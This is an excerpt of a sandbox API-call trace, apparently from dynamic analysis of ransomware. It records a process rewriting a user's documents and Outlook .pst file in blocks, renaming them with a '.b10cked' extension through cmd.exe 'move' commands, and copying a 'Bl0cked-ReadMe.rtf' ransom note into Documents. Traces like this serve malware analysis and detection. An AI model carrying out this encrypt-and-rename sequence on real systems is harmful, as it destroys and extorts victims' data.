lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.576] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.576] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0xf8b2 [0236.576] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.576] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0xf3ca [0236.576] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0xf8b2 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0xf8b2 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0236.577] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7c58, 
lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7c58, lpOverlapped=0x0) returned 1 [0236.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0236.577] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7c58, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7c58, lpOverlapped=0x0) returned 1 [0236.578] SetFilePointer (in: hFile=0x120, lDistanceToMove=-31832, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7c5a [0236.578] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x7c58, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x7c58, lpOverlapped=0x0) returned 1 [0236.578] SetFilePointer (in: hFile=0x120, lDistanceToMove=-31832, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x7c5a [0236.578] WriteFile (in: hFile=0x120, lpBuffer=0x123fd48*, nNumberOfBytesToWrite=0x7c58, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesWritten=0x12ec1c*=0x7c58, lpOverlapped=0x0) returned 1 [0236.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ngdm.pptx", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0236.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Ngdm.pptx", cchWideChar=9, lpMultiByteStr=0x131322c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Ngdm.pptx", lpUsedDefaultChar=0x0) returned 9 [0236.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: 
lpDistanceToMoveHigh=0x12ece0*=0) returned 0xf8b2 [0236.582] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0236.582] CloseHandle (hObject=0x120) returned 1 [0236.583] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\Ngdm.pptx", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT") returned 0x24 [0236.584] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0236.584] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xbf8, dwThreadId=0xbc8)) returned 1 [0236.598] CloseHandle (hObject=0x1b4) returned 1 [0236.598] CloseHandle (hObject=0x120) returned 1 [0236.598] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0236.598] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\My 
Shapes\\", cchLength=0x25 | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\MY SHAPES\\") returned 0x25 [0236.598] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DOCUMENTS\\MY SHAPES\\", cchCount2=37) returned 1 [0236.598] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Documents\\", cchLength=0x1b | out: lpsz="C:\\USERS\\EEBSYM5\\DOCUMENTS\\") returned 0x1b [0236.598] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0236.598] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\EEBSYM5\\DOCUMENTS\\", cchCount1=27, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 3 [0236.598] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0236.598] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0236.598] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0236.598] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\") returned 0x1a [0236.599] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0236.599] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0236.599] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > 
\"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xc50, dwThreadId=0x678)) returned 1 [0236.602] CloseHandle (hObject=0x1b4) returned 1 [0236.602] CloseHandle (hObject=0x120) returned 1 [0236.602] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Documents\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\documents\\bl0cked-readme.rtf")) returned 0x20 [0236.602] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0236.602] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Documents", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0236.602] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0236.602] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.602] ReleaseMutex (hMutex=0xf8) returned 1 [0236.602] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.603] ReleaseMutex (hMutex=0xf8) returned 1 [0236.603] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.603] ReleaseMutex (hMutex=0xf8) returned 1 [0236.603] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0236.603] ReleaseMutex (hMutex=0xf8) returned 1 [0236.603] CreateFileW 
(lpFileName="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst" (normalized: "c:\\users\\eebsym5\\documents\\outlook files\\feasf@efw.com.pst"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] QueryPerformanceCounter (in: lpPerformanceCount=0x12ed38 | out: lpPerformanceCount=0x12ed38*=29339305155) returned 1 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer 
(in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.604] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) 
returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x42400 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0236.605] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x41f18 [0236.605] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0236.606] SetFilePointer (in: hFile=0x120, 
lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0236.606] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0236.606] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x42400 [0236.606] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0236.607] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0236.607] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0236.607] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x42400 [0236.607] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0236.607] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0236.607] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0236.921] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0236.928] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, 
nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0236.929] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0236.930] WriteFile (in: hFile=0x120, lpBuffer=0x14489a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14489a8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0236.930] WriteFile (in: hFile=0x120, lpBuffer=0x14489a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14489a8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0236.930] WriteFile (in: hFile=0x120, lpBuffer=0x14489a8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14489a8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0236.930] SetFilePointer (in: hFile=0x120, lDistanceToMove=-131072, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x22400 [0236.930] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0236.931] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0xf000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0xf000, lpOverlapped=0x0) returned 1 [0236.932] ReadFile (in: hFile=0x120, lpBuffer=0x123fd48, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x123fd48*, lpNumberOfBytesRead=0x12ec08*=0x2000, lpOverlapped=0x0) returned 1 [0236.932] SetFilePointer (in: hFile=0x120, lDistanceToMove=-131072, 
lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x22400 [0236.932] WriteFile (in: hFile=0x120, lpBuffer=0x14489a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14489a8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0236.933] WriteFile (in: hFile=0x120, lpBuffer=0x14489a8*, nNumberOfBytesToWrite=0xf000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14489a8*, lpNumberOfBytesWritten=0x12ec1c*=0xf000, lpOverlapped=0x0) returned 1 [0236.933] WriteFile (in: hFile=0x120, lpBuffer=0x14489a8*, nNumberOfBytesToWrite=0x2000, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x14489a8*, lpNumberOfBytesWritten=0x12ec1c*=0x2000, lpOverlapped=0x0) returned 1 [0236.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="feasf@efw.com.pst", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0236.937] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="feasf@efw.com.pst", cchWideChar=17, lpMultiByteStr=0x1328834, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="feasf@efw.com.pst", lpUsedDefaultChar=0x0) returned 17 [0236.937] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x42400 [0236.937] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0236.937] CloseHandle (hObject=0x120) returned 1 [0236.939] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\feasf@efw.com.pst", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: 
lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST") returned 0x2f [0236.939] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\Documents\\Outlook Files\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\") returned 0x23 [0236.940] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\FEASF@~1.PST\" \"C:\\Users\\EEBsYm5\\DOCUME~1\\OUTLOO~1\\feasf@efw.com.pst.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), 